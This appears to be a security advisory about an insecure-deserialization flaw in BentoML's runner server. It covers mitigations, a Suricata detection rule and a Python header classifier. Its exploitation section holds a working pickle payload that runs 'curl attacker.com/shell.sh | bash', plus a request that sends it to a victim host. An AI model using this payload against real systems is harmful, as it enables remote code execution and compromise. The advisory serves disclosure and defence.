BentoML, Insecure Deserialization, CVE-2023-XXXX (Critical)

How the CVE Works:

The vulnerability stems from BentoML's runner server failing to validate user-supplied headers before deserializing the request body. When a POST request arrives with `args-number: 1`, the server hands the payload to `_deserialize_single_param()`. The `Payload-Container`, `Payload-Meta` and `Batch-Size` headers are attacker-controlled, and manipulating them steers the server into unsafe deserialization via `pickle.loads()`. A crafted pickle payload (for example, one defining `__reduce__`) therefore executes arbitrary OS commands. Both `NdarrayContainer` and `PandasDataFrameContainer` are affected, since both call `pickle.loads()` when `Payload-Meta` carries `format: "default"`.

DailyCVE Form:

Platform: BentoML
Version: <1.0.8
Vulnerability: Insecure Deserialization
Severity: Critical
Date: 2023-XX-XX

What Undercode Says:

Exploitation:

1. Craft Pickle Payload:

import pickle, os

class Exploit:
    # __reduce__ tells pickle how to rebuild the object; the callable it returns
    # is invoked by the unpickler during pickle.loads().
    def __reduce__(self):
        return (os.system, ('curl attacker.com/shell.sh | bash',))

payload = pickle.dumps(Exploit())

2. Send Malicious Request:

import requests

headers = {
    "args-number": "1",
    "Payload-Container": "NdarrayContainer",
    "Payload-Meta": '{"format": "default"}',
    "Batch-Size": "-1",
}
requests.post("http://victim:8888/", headers=headers, data=payload)

Mitigation:

1. Patch: Upgrade to BentoML >=1.0.8.
2. Input Validation: Reject `Content-Type: application/vnd.bentoml.pickled` unless explicitly required.
3. Sandboxing: Run BentoML in isolated containers with restricted syscall access.
4. Network Controls: Restrict runner-server ports (e.g., --port 8888) to trusted IPs.

Detection:

  • Log Analysis:
    grep -r "Payload-Container" /var/log/bentoml/runner.log
    
  • IDS Rule (Suricata):
    alert http any any -> $HOME_NET 8888 (msg:"BentoML Runner Pickle Deserialization Attempt"; flow:established,to_server; http.method; content:"POST"; http.header; content:"args-number|3a| 1"; nocase; http.header; content:"Payload-Container|3a|"; nocase; http.header; content:"|22|format|22|: |22|default|22|"; sid:1000001; rev:1;)
    
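As an added, defensive example (not code from the advisory or from BentoML), the following Python function applies the header conditions described above to an in-memory request, so the same check can be run offline over proxy or access-log data. The header names and values follow the advisory; the sample requests and the pickle PROTO-byte heuristic are constructed assumptions of this example.

```python
import json

# Containers that, per the advisory, route a "default"-format payload to pickle.loads().
PICKLE_CONTAINERS = {"NdarrayContainer", "PandasDataFrameContainer"}
# Pickles written with protocol 2 or newer start with the PROTO opcode (0x80); this is
# only a heuristic, since protocol 0 and 1 pickles carry no such prefix.
PICKLE_PROTO_OPCODE = b"\x80"

def parse_payload_meta(raw: str) -> dict:
    """Payload-Meta is expected to be a JSON object; anything else yields {}."""
    try:
        meta = json.loads(raw)
    except ValueError:
        return {}
    return meta if isinstance(meta, dict) else {}

def classify_runner_request(headers: dict, body: bytes) -> list:
    """Return the reasons a runner POST matches the unsafe-deserialization pattern
    from the advisory; an empty list means nothing matched."""
    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    reasons = []
    container = h.get("payload-container", "")
    meta = parse_payload_meta(h.get("payload-meta", ""))
    if container in PICKLE_CONTAINERS and meta.get("format") == "default":
        reasons.append(f"{container} with format=default reaches pickle.loads()")
    if h.get("args-number") == "1" and body.startswith(PICKLE_PROTO_OPCODE):
        reasons.append("single-argument request whose body starts with a pickle PROTO opcode")
    return reasons

# Constructed samples, not real traffic. The suspicious body only mimics the first
# pickle byte; it is not a valid pickle.
SUSPICIOUS_HEADERS = {
    "args-number": "1",
    "Payload-Container": "NdarrayContainer",
    "Payload-Meta": '{"format": "default"}',
    "Batch-Size": "-1",
}
SUSPICIOUS_BODY = b"\x80\x04placeholder"
BENIGN_HEADERS = {"args-number": "1", "Payload-Container": "NdarrayContainer",
                  "Payload-Meta": '{"format": "json"}'}
BENIGN_BODY = b"[1, 2, 3]"

if __name__ == "__main__":
    for name, hdrs, body in (("suspicious", SUSPICIOUS_HEADERS, SUSPICIOUS_BODY),
                             ("benign", BENIGN_HEADERS, BENIGN_BODY)):
        print(name, classify_runner_request(hdrs, body))
```

A hit on the container/format condition alone is the stronger signal; the PROTO-byte check mainly adds confidence when the body is available.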

Post-Exploit Forensics:

  • Check Runner Logs:
    journalctl -u bentoml-runner --no-pager | grep "async_run"
    
  • Inspect Active Connections:
    ss -tulnp | grep 8888
    

References:

Reported By: https://github.com/advisories/GHSA-7v4r-c989-xh26